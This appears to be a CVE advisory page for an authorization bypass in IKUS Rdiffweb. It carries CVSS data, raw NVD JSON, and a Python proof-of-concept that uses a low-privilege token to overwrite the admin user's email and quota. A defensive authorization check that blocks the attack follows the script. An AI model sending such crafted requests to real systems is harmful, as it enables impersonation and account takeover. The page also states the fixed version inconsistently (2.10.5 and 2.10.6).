Security Vulnerability Report
CVE-2025-67796 CVSS 8.1 HIGH

CVE-2025-67796

Published: 2026-05-04 20:16:16
Last Modified: 2026-05-07 15:53:50

Description

IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce a binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users' data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

IKUS Rdiffweb < 2.10.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://vulnerable-host/api/users/settings"
attacker_token = "VALID_LOW_PRIVILEGE_TOKEN_HERE"

# Headers with the stolen or valid token
headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json",
}

# Payload attempting to modify another user's data (IDOR)
# The attacker changes the 'username' field to target a different user
malicious_payload = {
    "username": "admin",  # Target user to impersonate
    "email": "[email protected]",
    "disk_quota": "0",
}

try:
    # Send the crafted request
    response = requests.post(target_url, headers=headers, json=malicious_payload, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! User data modified via authorization bypass.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
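The check the description says the affected API lacks, as an added defender-side example that is not Rdiffweb's code and is not part of this report: a settings update is authorized only after the token's subject has been bound to the targeted user and tenant, and privileged fields are gated on role even for a user's own account. The user directory, field policy and function names are assumptions constructed for illustration; the payload shape mirrors the PoC above.

```python
from dataclasses import dataclass

# Assumed field policy (constructed for this example, not Rdiffweb's).
SELF_EDITABLE = {"email", "lang"}    # a user may change these on their own account
ADMIN_ONLY = {"disk_quota", "role"}  # privileged fields: admin role required

@dataclass(frozen=True)
class Subject:
    username: str        # identity the access token was issued to
    tenant: str          # tenant the token belongs to
    is_admin: bool = False

@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str

# Constructed user directory standing in for the application's user store.
USERS = {
    "admin": Subject("admin", "tenant-a", is_admin=True),
    "alice": Subject("alice", "tenant-a"),
    "bob": Subject("bob", "tenant-b"),
}

def authorize_settings_update(subject: Subject, payload: dict) -> Decision:
    """Bind the token's subject to the user the payload targets before any write.

    A body-supplied 'username' selects the target but never overrides who the
    token belongs to; each cross-user or cross-tenant step needs an explicit grant.
    """
    target_name = payload.get("username", subject.username)
    target = USERS.get(target_name)
    if target is None:
        return Decision(False, f"unknown target user {target_name!r}")
    fields = set(payload) - {"username"}
    unknown = fields - SELF_EDITABLE - ADMIN_ONLY
    if unknown:
        return Decision(False, f"unknown field(s): {sorted(unknown)}")
    if target.tenant != subject.tenant:  # binding 1: tenant, even for admins
        return Decision(False, "cross-tenant request")
    if target_name != subject.username and not subject.is_admin:  # binding 2: user
        return Decision(False, "subject is not bound to target user")
    privileged = fields & ADMIN_ONLY
    if privileged and not subject.is_admin:  # binding 3: privileged fields
        return Decision(False, f"admin-only field(s): {sorted(privileged)}")
    return Decision(True, "ok")

if __name__ == "__main__":
    poc = {"username": "admin", "email": "x@example.invalid", "disk_quota": "0"}
    print(authorize_settings_update(USERS["alice"], poc))  # denied: not bound
```

Logging each denial with the subject, the requested target and the reason gives a direct detection signal for token misuse of this kind.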

References

https://gitlab.com/ikus-soft/rdiffweb
https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67796", "sourceIdentifier": "[email protected]", "published": "2026-05-04T20:16:16.260", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://gitlab.com/ikus-soft/rdiffweb", "source": "[email protected]"}, {"url": "https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02", "source": "[email protected]"}]}}